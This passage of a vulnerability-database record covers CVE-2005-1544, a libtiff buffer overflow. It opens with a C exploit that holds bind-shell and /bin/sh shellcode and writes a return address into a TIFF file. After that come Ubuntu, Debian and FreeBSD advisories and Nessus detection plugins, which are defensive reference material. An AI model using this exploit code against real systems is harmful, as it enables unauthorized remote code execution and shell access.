<unistd.h>\n#include <sys/types.h>\n#include <sys/stat.h>\n#include <fcntl.h>\n\n#define OFFSET 0x3F /* return address offset */\n#define SHELL_OFFSET 0x0102 /* shellcode address offset */\n#define DISPLAY \"DISPLAY=:0.0\" /* no comments ... */\n#define HOMEDIR \"HOME=/tmp/\"\n\nint\nmain(int argc, char **argv, char **env)\n{\n /* Linux shellcode that binds a shell on port 4369 */\nchar linux_bind[] = \"\\x31\\xc0\\x50\\x40\\x50\\x40\\x50\\xb0\\x66\\x31\"\n \"\\xdb\\x43\\x89\\xe1\\xcd\\x80\\x99\\x52\\x52\\x52\"\n \"\\xba\\x02\\x01\\x11\\x11\\xfe\\xce\\x52\\x89\\xe2\"\n \"\\x31\\xc9\\xb1\\x10\\x51\\x52\\x50\\x89\\xc2\\x89\"\n \"\\xe1\\xb0\\x66\\xb3\\x02\\x89\\xe1\\xcd\\x80\\xb0\"\n \"\\x66\\xb3\\x04\\x53\\x52\\x89\\xe1\\xcd\\x80\\x31\"\n \"\\xc0\\x50\\x50\\x52\\x89\\xe1\\xb0\\x66\\xb3\\x05\"\n \"\\xcd\\x80\\x89\\xc3\\x31\\xc9\\xb1\\x03\\xb0\\x3f\"\n \"\\x49\\xcd\\x80\\x41\\xe2\\xf8\\x51\\x68\\x6e\\x2f\"\n \"\\x73\\x68\\x68\\x2f\\x2f\\x62\\x69\\x89\\xe3\\x51\"\n \"\\x53\\x89\\xe1\\x99\\xb0\\x0b\\xcd\\x80\";\n\n /* (?) 
lies lies lies lies!*/\n #ifdef FREEBSD\n printf(\"FreeBSD Enabled\\n\");\n char shellcode[]=\n \"\\xeb\\x0e\\x5e\\x31\\xc0\\x88\\x46\\x07\\x50\\x50\\x56\\xb0\\x3b\\x50\\xcd\"\n \"\\x80\\xe8\\xed\\xff\\xff\\xff\\x2f\\x62\\x69\\x6e\\x2f\\x73\\x68\\x23\";\n \n #else\n printf(\"Linux Enabled\\n\");\n char shellcode[] =\n \"\\xeb\\x20\\x5e\\x89\\x76\\x08\\x31\\xc0\\x89\\x46\\x0c\"\n \"\\x88\\x46\\x07\\x8d\\x56\\x0c\\x8d\\x4e\\x08\\x89\\xf3\"\n \"\\x31\\xc0\\xb0\\x0b\\xcd\\x80\\x31\\xdb\\xb0\\x01\\xcd\"\n \"\\x80\\xe8\\xdb\\xff\\xff\\xff\\x2f\\x62\\x69\\x6e\\x2f\"\n \"\\x73\\x68\\x23\";\n \n #endif\n\n if(argc < 3)\n {\n fprintf(stderr, \"Error, arguments are like these\\n\"\n \"%s <path_to_vuln> <eviltiff.tiff>\\n\", argv[0]);\n return -1;\n }\n \n char *envp[] = {HOMEDIR, DISPLAY, shellcode, NULL};\n \n /* argv[1] -> executable file that is linked with vuln tiff library */\n long ret = 0xc0000000 - sizeof(void *) - strlen(argv[1]) - strlen(shellcode) - 0x02;\n \n int fd = open(argv[2], O_RDWR);\n if(fd == -1)\n {\n perror(\"open()\");\n return -1;\n }\n \n if(lseek(fd, OFFSET, SEEK_SET) == -1)\n {\n perror(\"lseek()\");\n close(fd);\n return -1;\n }\n \n if(write(fd, (void *) &ret, sizeof(long)) < sizeof(long))\n {\n perror(\"write()\");\n close(fd);\n return -1;\n }\n \n close(fd);\n \n fprintf(stdout, \"Using RET: 0x%.8x\\n\", (unsigned int) ret);\n \n if(execle(argv[1], \"tiff\", argv[2], NULL, envp) == -1)\n {\n perror(\"execve()\");\n return -1;\n }\n \n return 0;\n}\n\n// milw0rm.com [2006-03-05]\n", "cvss": {"score": 7.5, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:PARTIAL/I:PARTIAL/A:PARTIAL/"}, "sourceHref": "https://www.exploit-db.com/download/1554/"}], "securityvulns": [{"lastseen": "2018-08-31T11:10:12", "bulletinFamily": "software", "cvelist": ["CVE-2005-1544"], "description": "===========================================================\r\nUbuntu Security Notice USN-130-1 May 19, 2005\r\ntiff 
vulnerability\r\nCAN-2005-1544\r\n===========================================================\r\n\r\nA security issue affects the following Ubuntu releases:\r\n\r\nUbuntu 4.10 (Warty Warthog)\r\nUbuntu 5.04 (Hoary Hedgehog)\r\n\r\nThe following packages are affected:\r\n\r\nlibtiff4\r\n\r\nThe problem can be corrected by upgrading the affected package\r\nto\r\nversion 3.6.1-1.1ubuntu1.3 (for Ubuntu 4.10), or\r\n3.6.1-5ubuntu0.1 (for\r\nUbuntu 5.04). After a standard system upgrade you need to\r\nrestart\r\nyour CUPS server with\r\n\r\n sudo /etc/init.d/cupsys restart\r\n\r\nto effect the necessary changes.\r\n\r\nDetails follow:\r\n\r\nTavis Ormandy discovered a buffer overflow in the TIFF library.\r\nmalicious image with an invalid "bits per sample" number could\r\nbe\r\nconstructed which, when decoded, would have resulted in\r\nexecution of\r\narbitrary code with the privileges of the process using the\r\nlibrary.\r\n\r\nSince this library is used in many applications like\r\n"ghostscript" and\r\nthe "CUPS" printing system, this vulnerability may lead to\r\nremotely\r\ninduced privilege escalation.\r\n\r\nUpdated packages for Ubuntu 4.10 (Warty Warthog):\r\n\r\n Source archives:\r\n\r\n \r\nhttp://security.ubuntu.com/ubuntu/pool/main/t/tiff/tiff_3.6.1-1.1ubuntu1.3.diff.gz\r\n Size/MD5: 23204 9ac3ca3fba6f2dfee338a6ead67dd861\r\n \r\nhttp://security.ubuntu.com/ubuntu/pool/main/t/tiff/tiff_3.6.1-1.1ubuntu1.3.dsc\r\n Size/MD5: 646 dd500c399e6e27e8fccc0a2217b81e24\r\n \r\nhttp://security.ubuntu.com/ubuntu/pool/main/t/tiff/tiff_3.6.1.orig.tar.gz\r\n Size/MD5: 848760 bd252167a20ac7910ab3bd2b3ee9e955\r\n\r\n amd64 architecture (Athlon64, Opteron, EM64T Xeon)\r\n\r\n \r\nhttp://security.ubuntu.com/ubuntu/pool/universe/t/tiff/libtiff-tools_3.6.1-1.1ubuntu1.3_amd64.deb\r\n Size/MD5: 172882 44812e9c564e534afaf120298a05649d\r\n \r\nhttp://security.ubuntu.com/ubuntu/pool/main/t/tiff/libtiff4-dev_3.6.1-1.1ubuntu1.3_amd64.deb\r\n Size/MD5: 458464 
45c8e715cfd6d0d10a8f7755d444e8b2\r\n \r\nhttp://security.ubuntu.com/ubuntu/pool/main/t/tiff/libtiff4_3.6.1-1.1ubuntu1.3_amd64.deb\r\n Size/MD5: 111528 c3e7f1e32d02fb2f43dcd7eba004f410\r\n\r\n i386 architecture (x86 compatible Intel/AMD)\r\n\r\n \r\nhttp://security.ubuntu.com/ubuntu/pool/universe/t/tiff/libtiff-tools_3.6.1-1.1ubuntu1.3_i386.deb\r\n Size/MD5: 157242 89a8e234340550fbb7b51b0665f57b07\r\n \r\nhttp://security.ubuntu.com/ubuntu/pool/main/t/tiff/libtiff4-dev_3.6.1-1.1ubuntu1.3_i386.deb\r\n Size/MD5: 439630 bc310ca8d58fd2edff9becf96618016a\r\n \r\nhttp://security.ubuntu.com/ubuntu/pool/main/t/tiff/libtiff4_3.6.1-1.1ubuntu1.3_i386.deb\r\n Size/MD5: 102426 b57bcb6731278bd7b9efac661b1d5b29\r\n\r\n powerpc architecture (Apple Macintosh G3/G4/G5)\r\n\r\n \r\nhttp://security.ubuntu.com/ubuntu/pool/universe/t/tiff/libtiff-tools_3.6.1-1.1ubuntu1.3_powerpc.deb\r\n Size/MD5: 187860 a90692f339814812b81b45bd42b020ad\r\n \r\nhttp://security.ubuntu.com/ubuntu/pool/main/t/tiff/libtiff4-dev_3.6.1-1.1ubuntu1.3_powerpc.deb\r\n Size/MD5: 462482 263381d0e365ef440423e5a39fce2fd9\r\n \r\nhttp://security.ubuntu.com/ubuntu/pool/main/t/tiff/libtiff4_3.6.1-1.1ubuntu1.3_powerpc.deb\r\n Size/MD5: 112628 7e2d3f122c362d9afce7fdb1058e1628\r\n\r\nUpdated packages for Ubuntu 5.04 (Hoary Hedgehog):\r\n\r\n Source archives:\r\n\r\n \r\nhttp://security.ubuntu.com/ubuntu/pool/main/t/tiff/tiff_3.6.1-5ubuntu0.1.diff.gz\r\n Size/MD5: 23765 32eb02942dff40b39c1d15250c3c0859\r\n \r\nhttp://security.ubuntu.com/ubuntu/pool/main/t/tiff/tiff_3.6.1-5ubuntu0.1.dsc\r\n Size/MD5: 681 2450a075bf97cc3f9e6824361985c8d4\r\n \r\nhttp://security.ubuntu.com/ubuntu/pool/main/t/tiff/tiff_3.6.1.orig.tar.gz\r\n Size/MD5: 848760 bd252167a20ac7910ab3bd2b3ee9e955\r\n\r\n amd64 architecture (Athlon64, Opteron, EM64T Xeon)\r\n\r\n \r\nhttp://security.ubuntu.com/ubuntu/pool/main/t/tiff/libtiff-tools_3.6.1-5ubuntu0.1_amd64.deb\r\n Size/MD5: 172924 7231c0247df7c384675a9c6635daa4c3\r\n 
\r\nhttp://security.ubuntu.com/ubuntu/pool/main/t/tiff/libtiff4-dev_3.6.1-5ubuntu0.1_amd64.deb\r\n Size/MD5: 458530 0dc168ca75707a0ad7cae668ee8f8c94\r\n \r\nhttp://security.ubuntu.com/ubuntu/pool/main/t/tiff/libtiff4_3.6.1-5ubuntu0.1_amd64.deb\r\n Size/MD5: 111658 3f9045465c9ec449afa7ed5f407ef182\r\n\r\n i386 architecture (x86 compatible Intel/AMD)\r\n\r\n \r\nhttp://security.ubuntu.com/ubuntu/pool/main/t/tiff/libtiff-tools_3.6.1-5ubuntu0.1_i386.deb\r\n Size/MD5: 155938 1a2182f4b9d338b6384a285aa4274193\r\n \r\nhttp://security.ubuntu.com/ubuntu/pool/main/t/tiff/libtiff4-dev_3.6.1-5ubuntu0.1_i386.deb\r\n Size/MD5: 439730 df6990250a7715682cadfdef6a6e8bb3\r\n \r\nhttp://security.ubuntu.com/ubuntu/pool/main/t/tiff/libtiff4_3.6.1-5ubuntu0.1_i386.deb\r\n Size/MD5: 102640 15d2802c1720a6597838adb38fd69b8f\r\n\r\n powerpc architecture (Apple Macintosh G3/G4/G5)\r\n\r\n \r\nhttp://security.ubuntu.com/ubuntu/pool/main/t/tiff/libtiff-tools_3.6.1-5ubuntu0.1_powerpc.deb\r\n Size/MD5: 188166 0cdfe537f7838f94dad74e96e9d741b4\r\n \r\nhttp://security.ubuntu.com/ubuntu/pool/main/t/tiff/libtiff4-dev_3.6.1-5ubuntu0.1_powerpc.deb\r\n Size/MD5: 462522 673438e0b48b119901dfc70189a1af94\r\n \r\nhttp://security.ubuntu.com/ubuntu/pool/main/t/tiff/libtiff4_3.6.1-5ubuntu0.1_powerpc.deb\r\n Size/MD5: 112828 656a62054187e8a3c803fecc54f6fe09", "edition": 1, "modified": "2005-05-19T00:00:00", "published": "2005-05-19T00:00:00", "id": "SECURITYVULNS:DOC:8665", "href": "https://vulners.com/securityvulns/SECURITYVULNS:DOC:8665", "title": "[Full-disclosure] [USN-130-1] TIFF library vulnerability", "type": "securityvulns", "cvss": {"score": 7.5, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:PARTIAL/I:PARTIAL/A:PARTIAL/"}}], "debian": [{"lastseen": "2020-11-11T13:12:20", "bulletinFamily": "unix", "cvelist": ["CVE-2005-1544"], "description": "- --------------------------------------------------------------------------\nDebian Security Advisory DSA 755-1 security@debian.org\nhttp://www.debian.org/security/ Martin 
Schulze\nJuly 13th, 2005 http://www.debian.org/security/faq\n- --------------------------------------------------------------------------\n\nPackage : tiff\nVulnerability : buffer overflow\nProblem-Type : remote\nDebian-specific: no\nCVE ID : CAN-2005-1544\nDebian Bug : 309739\n\nFrank Warmerdam discovered a stack-based buffer overflow in libtiff,\nthe Tag Image File Format library for processing TIFF graphics files\nthat can lead to the execution of arbitrary code via malformed TIFF\nfiles.\n\nFor the old stable distribution (woody) this problem has been fixed in\nversion 3.5.5-7\n\nFor the stable distribution (sarge) this problem has been fixed in\nversion 3.7.2-3.\n\nFor the unstable distribution (sid) this problem has been fixed in\nversion 3.7.2-3.\n\nWe recommend that you upgrade your libtiff packages.\n\n\nUpgrade Instructions\n- --------------------\n\nwget url\n will fetch the file for you\ndpkg -i file.deb\n will install the referenced file.\n\nIf you are using the apt-get package manager, use the line for\nsources.list as given below:\n\napt-get update\n will update the internal database\napt-get upgrade\n will install corrected packages\n\nYou may use an automated update by adding the resources from the\nfooter to the proper configuration.\n\n\nDebian GNU/Linux 3.0 alias woody\n- --------------------------------\n\n Source archives:\n\n http://security.debian.org/pool/updates/main/t/tiff/tiff_3.5.5-7.dsc\n Size/MD5 checksum: 623 fdb202eb01852d3aab26758f5f9a50ce\n http://security.debian.org/pool/updates/main/t/tiff/tiff_3.5.5-7.diff.gz\n Size/MD5 checksum: 37270 3e154325390b0446bee083a7470adaac\n http://security.debian.org/pool/updates/main/t/tiff/tiff_3.5.5.orig.tar.gz\n Size/MD5 checksum: 693641 3b7199ba793dec6ca88f38bb0c8cc4d8\n\n Alpha architecture:\n\n http://security.debian.org/pool/updates/main/t/tiff/libtiff-tools_3.5.5-7_alpha.deb\n Size/MD5 checksum: 141498 f0d74c745fc5f75016e190f7c9af0604\n 
http://security.debian.org/pool/updates/main/t/tiff/libtiff3g_3.5.5-7_alpha.deb\n Size/MD5 checksum: 105544 ff3fe1edd72064a3cec25578decb4ce8\n http://security.debian.org/pool/updates/main/t/tiff/libtiff3g-dev_3.5.5-7_alpha.deb\n Size/MD5 checksum: 423258 d26ce2a8049612b29c4736f341930439\n\n ARM architecture:\n\n http://security.debian.org/pool/updates/main/t/tiff/libtiff-tools_3.5.5-7_arm.deb\n Size/MD5 checksum: 117004 f1c9aafcdaae7148cdb5f13e1805ded5\n http://security.debian.org/pool/updates/main/t/tiff/libtiff3g_3.5.5-7_arm.deb\n Size/MD5 checksum: 90842 e13019cb16071175cc0b88526d6dc28a\n http://security.debian.org/pool/updates/main/t/tiff/libtiff3g-dev_3.5.5-7_arm.deb\n Size/MD5 checksum: 404308 162fe09877bf4e31044ad2c1c16983bf\n\n Intel IA-32 architecture:\n\n http://security.debian.org/pool/updates/main/t/tiff/libtiff-tools_3.5.5-7_i386.deb\n Size/MD5 checksum: 112070 9351594ccf87495bc0ec6fb3624d9983\n http://security.debian.org/pool/updates/main/t/tiff/libtiff3g_3.5.5-7_i386.deb\n Size/MD5 checksum: 81468 76f340590aa4a0546d810a7e7c7691a8\n http://security.debian.org/pool/updates/main/t/tiff/libtiff3g-dev_3.5.5-7_i386.deb\n Size/MD5 checksum: 386938 25f47760934bf3abdf6aa5ac60a0bf84\n\n Intel IA-64 architecture:\n\n http://security.debian.org/pool/updates/main/t/tiff/libtiff-tools_3.5.5-7_ia64.deb\n Size/MD5 checksum: 158806 0a4abf7ed300b3c33a2e590caa3dd2c1\n http://security.debian.org/pool/updates/main/t/tiff/libtiff3g_3.5.5-7_ia64.deb\n Size/MD5 checksum: 135786 341bf0f708522080b931e89a87b598a6\n http://security.debian.org/pool/updates/main/t/tiff/libtiff3g-dev_3.5.5-7_ia64.deb\n Size/MD5 checksum: 446574 126ed5be544a1eefe30228d06db9e219\n\n HP Precision architecture:\n\n http://security.debian.org/pool/updates/main/t/tiff/libtiff-tools_3.5.5-7_hppa.deb\n Size/MD5 checksum: 128298 db87d7cbeb3620736f8cabb0286f831e\n http://security.debian.org/pool/updates/main/t/tiff/libtiff3g_3.5.5-7_hppa.deb\n Size/MD5 checksum: 107142 515937e00c5a75f3efa61749a8c8cf58\n 
http://security.debian.org/pool/updates/main/t/tiff/libtiff3g-dev_3.5.5-7_hppa.deb\n Size/MD5 checksum: 420334 0f55b4124cd813964a438403f1253582\n\n Motorola 680x0 architecture:\n\n http://security.debian.org/pool/updates/main/t/tiff/libtiff-tools_3.5.5-7_m68k.deb\n Size/MD5 checksum: 107324 33229624caf61822d6cf77e90872c6f9\n http://security.debian.org/pool/updates/main/t/tiff/libtiff3g_3.5.5-7_m68k.deb\n Size/MD5 checksum: 80132 4d4279969b7526649874eb657accc2b1\n http://security.debian.org/pool/updates/main/t/tiff/libtiff3g-dev_3.5.5-7_m68k.deb\n Size/MD5 checksum: 380204 68a43fac8f06c48d38ddffc058c7242c\n\n Big endian MIPS architecture:\n\n http://security.debian.org/pool/updates/main/t/tiff/libtiff-tools_3.5.5-7_mips.deb\n Size/MD5 checksum: 124008 20f911e6540aa69fc85fd07567fe4697\n http://security.debian.org/pool/updates/main/t/tiff/libtiff3g_3.5.5-7_mips.deb\n Size/MD5 checksum: 88202 7d68f62089e9546c06d9ffa80e7b0a74\n http://security.debian.org/pool/updates/main/t/tiff/libtiff3g-dev_3.5.5-7_mips.deb\n Size/MD5 checksum: 410562 5fa6371f247618b5522ff51259ba35b2\n\n Little endian MIPS architecture:\n\n http://security.debian.org/pool/updates/main/t/tiff/libtiff-tools_3.5.5-7_mipsel.deb\n Size/MD5 checksum: 123504 ba3102303df4d1cbde4303a00e3428ed\n http://security.debian.org/pool/updates/main/t/tiff/libtiff3g_3.5.5-7_mipsel.deb\n Size/MD5 checksum: 88530 c1f77d45cda72501d85607ea50f5a4b2\n http://security.debian.org/pool/updates/main/t/tiff/libtiff3g-dev_3.5.5-7_mipsel.deb\n Size/MD5 checksum: 410766 3e3a11a28bc4f1f8081b77e5c72000b0\n\n PowerPC architecture:\n\n http://security.debian.org/pool/updates/main/t/tiff/libtiff-tools_3.5.5-7_powerpc.deb\n Size/MD5 checksum: 116072 045e7bbd3d4dfb9dc75268435aa62794\n http://security.debian.org/pool/updates/main/t/tiff/libtiff3g_3.5.5-7_powerpc.deb\n Size/MD5 checksum: 89824 3e7d286752e28fea6769936695e097d8\n http://security.debian.org/pool/updates/main/t/tiff/libtiff3g-dev_3.5.5-7_powerpc.deb\n Size/MD5 checksum: 402420 
876d140d9752aaea30cb4cd7f9a38cb2\n\n IBM S/390 architecture:\n\n http://security.debian.org/pool/updates/main/t/tiff/libtiff-tools_3.5.5-7_s390.deb\n Size/MD5 checksum: 116924 380141ee69a4a10201efc66182fe5616\n http://security.debian.org/pool/updates/main/t/tiff/libtiff3g_3.5.5-7_s390.deb\n Size/MD5 checksum: 92150 762a64a6166aa720fcbf5430a26760cf\n http://security.debian.org/pool/updates/main/t/tiff/libtiff3g-dev_3.5.5-7_s390.deb\n Size/MD5 checksum: 395362 228596854105753bc1a0139bc6e1fef0\n\n Sun Sparc architecture:\n\n http://security.debian.org/pool/updates/main/t/tiff/libtiff-tools_3.5.5-7_sparc.deb\n Size/MD5 checksum: 132902 65969fd417aa734f6299c0f35f15dff9\n http://security.debian.org/pool/updates/main/t/tiff/libtiff3g_3.5.5-7_sparc.deb\n Size/MD5 checksum: 88982 e674bafc1f1df1617b70f4184051da79\n http://security.debian.org/pool/updates/main/t/tiff/libtiff3g-dev_3.5.5-7_sparc.deb\n Size/MD5 checksum: 397132 e1ebfa6cdfec77c9c643f494e72d0714\n\n\n These files will probably be moved into the stable distribution on\n its next update.\n\n- ---------------------------------------------------------------------------------\nFor apt-get: deb http://security.debian.org/ stable/updates main\nFor dpkg-ftp: ftp://security.debian.org/debian-security dists/stable/updates/main\nMailing list: debian-security-announce@lists.debian.org\nPackage info: `apt-cache show <pkg>' and http://packages.debian.org/<pkg>\n\n", "edition": 9, "modified": "2005-07-13T00:00:00", "published": "2005-07-13T00:00:00", "id": "DEBIAN:DSA-755-1:F11EF", "href": "https://lists.debian.org/debian-security-announce/debian-security-announce-2005/msg00141.html", "title": "[SECURITY] [DSA 755-1] New tiff packages fix arbitrary code execution", "type": "debian", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}}], "freebsd": [{"lastseen": "2019-05-29T18:34:54", "bulletinFamily": "unix", "cvelist": ["CVE-2005-1544"], "description": "\nA Gentoo Linux Security Advisory reports:\n\nTavis Ormandy of 
the Gentoo Linux Security Audit Team\n\t discovered a stack based buffer overflow in the libTIFF\n\t library when reading a TIFF image with a malformed\n\t BitsPerSample tag.\nSuccessful exploitation would require the victim to open\n\t a specially crafted TIFF image, resulting in the execution\n\t of arbitrary code.\n\n", "edition": 4, "modified": "2006-06-08T00:00:00", "published": "2005-05-10T00:00:00", "id": "68222076-010B-11DA-BC08-0001020EED82", "href": "https://vuxml.freebsd.org/freebsd/68222076-010b-11da-bc08-0001020eed82.html", "title": "tiff -- buffer overflow vulnerability", "type": "freebsd", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}}], "nessus": [{"lastseen": "2021-01-01T06:37:13", "description": "Tavis Ormandy discovered a buffer overflow in the TIFF library. A\nmalicious image with an invalid 'bits per sample' number could be\nconstructed which, when decoded, would have resulted in execution of\narbitrary code with the privileges of the process using the library.\n\nSince this library is used in many applications like 'ghostscript' and\nthe 'CUPS' printing system, this vulnerability may lead to remotely\ninduced privilege escalation.\n\nNote that Tenable Network Security has extracted the preceding\ndescription block directly from the Ubuntu security advisory. 
Tenable\nhas attempted to automatically clean and format it as much as possible\nwithout introducing additional issues.", "edition": 23, "published": "2006-01-15T00:00:00", "title": "Ubuntu 4.10 / 5.04 : tiff vulnerability (USN-130-1)", "type": "nessus", "bulletinFamily": "scanner", "cvelist": ["CVE-2005-1544"], "modified": "2021-01-02T00:00:00", "cpe": ["p-cpe:/a:canonical:ubuntu_linux:libtiff4", "cpe:/o:canonical:ubuntu_linux:5.04", "cpe:/o:canonical:ubuntu_linux:4.10", "p-cpe:/a:canonical:ubuntu_linux:libtiff-tools", "p-cpe:/a:canonical:ubuntu_linux:libtiff4-dev"], "id": "UBUNTU_USN-130-1.NASL", "href": "https://www.tenable.com/plugins/nessus/20521", "sourceData": "#%NASL_MIN_LEVEL 80502\n#\n# (C) Tenable Network Security, Inc.\n#\n# The descriptive text and package checks in this plugin were\n# extracted from Ubuntu Security Notice USN-130-1. The text \n# itself is copyright (C) Canonical, Inc. See \n# <http://www.ubuntu.com/usn/>. Ubuntu(R) is a registered \n# trademark of Canonical, Inc.\n#\n\ninclude(\"compat.inc\");\n\nif (description)\n{\n script_id(20521);\n script_version(\"1.13\");\n script_cvs_date(\"Date: 2019/08/02 13:33:00\");\n\n script_cve_id(\"CVE-2005-1544\");\n script_xref(name:\"USN\", value:\"130-1\");\n\n script_name(english:\"Ubuntu 4.10 / 5.04 : tiff vulnerability (USN-130-1)\");\n script_summary(english:\"Checks dpkg output for updated packages.\");\n\n script_set_attribute(\n attribute:\"synopsis\", \n value:\n\"The remote Ubuntu host is missing one or more security-related\npatches.\"\n );\n script_set_attribute(\n attribute:\"description\", \n value:\n\"Tavis Ormandy discovered a buffer overflow in the TIFF library. 
A\nmalicious image with an invalid 'bits per sample' number could be\nconstructed which, when decoded, would have resulted in execution of\narbitrary code with the privileges of the process using the library.\n\nSince this library is used in many applications like 'ghostscript' and\nthe 'CUPS' printing system, this vulnerability may lead to remotely\ninduced privilege escalation.\n\nNote that Tenable Network Security has extracted the preceding\ndescription block directly from the Ubuntu security advisory. Tenable\nhas attempted to automatically clean and format it as much as possible\nwithout introducing additional issues.\"\n );\n script_set_attribute(\n attribute:\"solution\", \n value:\n\"Update the affected libtiff-tools, libtiff4 and / or libtiff4-dev\npackages.\"\n );\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:L/Au:N/C:P/I:P/A:P\");\n\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:canonical:ubuntu_linux:libtiff-tools\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:canonical:ubuntu_linux:libtiff4\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:canonical:ubuntu_linux:libtiff4-dev\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:canonical:ubuntu_linux:4.10\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:canonical:ubuntu_linux:5.04\");\n\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2005/05/19\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2006/01/15\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_copyright(english:\"Ubuntu Security Notice (C) 2005-2019 Canonical, Inc. 
/ NASL script (C) 2006-2016 Tenable Network Security, Inc.\");\n script_family(english:\"Ubuntu Local Security Checks\");\n\n script_dependencies(\"ssh_get_info.nasl\");\n script_require_keys(\"Host/cpu\", \"Host/Ubuntu\", \"Host/Ubuntu/release\", \"Host/Debian/dpkg-l\");\n\n exit(0);\n}\n\n\ninclude(\"audit.inc\");\ninclude(\"ubuntu.inc\");\ninclude(\"misc_func.inc\");\n\nif ( ! get_kb_item(\"Host/local_checks_enabled\") ) audit(AUDIT_LOCAL_CHECKS_NOT_ENABLED);\nrelease = get_kb_item(\"Host/Ubuntu/release\");\nif ( isnull(release) ) audit(AUDIT_OS_NOT, \"Ubuntu\");\nrelease = chomp(release);\nif (! ereg(pattern:\"^(4\\.10|5\\.04)$\", string:release)) audit(AUDIT_OS_NOT, \"Ubuntu 4.10 / 5.04\", \"Ubuntu \" + release);\nif ( ! get_kb_item(\"Host/Debian/dpkg-l\") ) audit(AUDIT_PACKAGE_LIST_MISSING);\n\ncpu = get_kb_item(\"Host/cpu\");\nif (isnull(cpu)) audit(AUDIT_UNKNOWN_ARCH);\nif (\"x86_64\" >!< cpu && cpu !~ \"^i[3-6]86$\") audit(AUDIT_LOCAL_CHECKS_NOT_IMPLEMENTED, \"Ubuntu\", cpu);\n\nflag = 0;\n\nif (ubuntu_check(osver:\"4.10\", pkgname:\"libtiff-tools\", pkgver:\"3.6.1-1.1ubuntu1.3\")) flag++;\nif (ubuntu_check(osver:\"4.10\", pkgname:\"libtiff4\", pkgver:\"3.6.1-1.1ubuntu1.3\")) flag++;\nif (ubuntu_check(osver:\"4.10\", pkgname:\"libtiff4-dev\", pkgver:\"3.6.1-1.1ubuntu1.3\")) flag++;\nif (ubuntu_check(osver:\"5.04\", pkgname:\"libtiff-tools\", pkgver:\"3.6.1-5ubuntu0.1\")) flag++;\nif (ubuntu_check(osver:\"5.04\", pkgname:\"libtiff4\", pkgver:\"3.6.1-5ubuntu0.1\")) flag++;\nif (ubuntu_check(osver:\"5.04\", pkgname:\"libtiff4-dev\", pkgver:\"3.6.1-5ubuntu0.1\")) flag++;\n\nif (flag)\n{\n security_report_v4(\n port : 0,\n severity : SECURITY_HOLE,\n extra : ubuntu_report_get()\n );\n exit(0);\n}\nelse\n{\n tested = ubuntu_pkg_tests_get();\n if (tested) audit(AUDIT_PACKAGE_NOT_AFFECTED, tested);\n else audit(AUDIT_PACKAGE_NOT_INSTALLED, \"libtiff-tools / libtiff4 / libtiff4-dev\");\n}\n", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}}, 
{"lastseen": "2021-01-06T10:03:22", "description": "Frank Warmerdam discovered a stack-based buffer overflow in libtiff,\nthe Tag Image File Format library for processing TIFF graphics files\nthat can lead to the execution of arbitrary code via malformed TIFF\nfiles.", "edition": 25, "published": "2005-07-13T00:00:00", "title": "Debian DSA-755-1 : tiff - buffer overflow", "type": "nessus", "bulletinFamily": "scanner", "cvelist": ["CVE-2005-1544"], "modified": "2005-07-13T00:00:00", "cpe": ["cpe:/o:debian:debian_linux:3.1", "cpe:/o:debian:debian_linux:3.0", "p-cpe:/a:debian:debian_linux:tiff"], "id": "DEBIAN_DSA-755.NASL", "href": "https://www.tenable.com/plugins/nessus/19189", "sourceData": "#%NASL_MIN_LEVEL 70300\n\n#\n# (C) Tenable Network Security, Inc.\n#\n# The descriptive text and package checks in this plugin were \n# extracted from Debian Security Advisory DSA-755. The text \n# itself is copyright (C) Software in the Public Interest, Inc.\n#\n\ninclude('deprecated_nasl_level.inc');\ninclude('compat.inc');\n\nif (description)\n{\n script_id(19189);\n script_version(\"1.18\");\n script_set_attribute(attribute:\"plugin_modification_date\", value:\"2021/01/04\");\n\n script_cve_id(\"CVE-2005-1544\");\n script_xref(name:\"DSA\", value:\"755\");\n\n script_name(english:\"Debian DSA-755-1 : tiff - buffer overflow\");\n script_summary(english:\"Checks dpkg output for the updated package\");\n\n script_set_attribute(\n attribute:\"synopsis\", \n value:\"The remote Debian host is missing a security-related update.\"\n );\n script_set_attribute(\n attribute:\"description\", \n value:\n\"Frank Warmerdam discovered a stack-based buffer overflow in libtiff,\nthe Tag Image File Format library for processing TIFF graphics files\nthat can lead to the execution of arbitrary code via malformed TIFF\nfiles.\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"http://bugs.debian.org/cgi-bin/bugreport.cgi?bug=309739\"\n );\n script_set_attribute(\n 
attribute:\"see_also\",\n value:\"http://www.debian.org/security/2005/dsa-755\"\n );\n script_set_attribute(\n attribute:\"solution\", \n value:\n\"Upgrade the libtiff packages.\n\nFor the old stable distribution (woody) this problem has been fixed in\nversion 3.5.5-7.\n\nFor the stable distribution (sarge) this problem has been fixed in\nversion 3.7.2-3.\"\n );\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:L/Au:N/C:P/I:P/A:P\");\n\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:debian:debian_linux:tiff\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:debian:debian_linux:3.0\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:debian:debian_linux:3.1\");\n\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2005/07/13\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2005/07/13\");\n script_set_attribute(attribute:\"vuln_publication_date\", value:\"2005/05/05\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_copyright(english:\"This script is Copyright (C) 2005-2021 Tenable Network Security, Inc.\");\n script_family(english:\"Debian Local Security Checks\");\n\n script_dependencies(\"ssh_get_info.nasl\");\n 